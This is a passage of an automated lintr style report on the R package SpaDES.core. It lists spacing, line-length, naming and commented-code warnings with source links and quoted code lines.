{\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      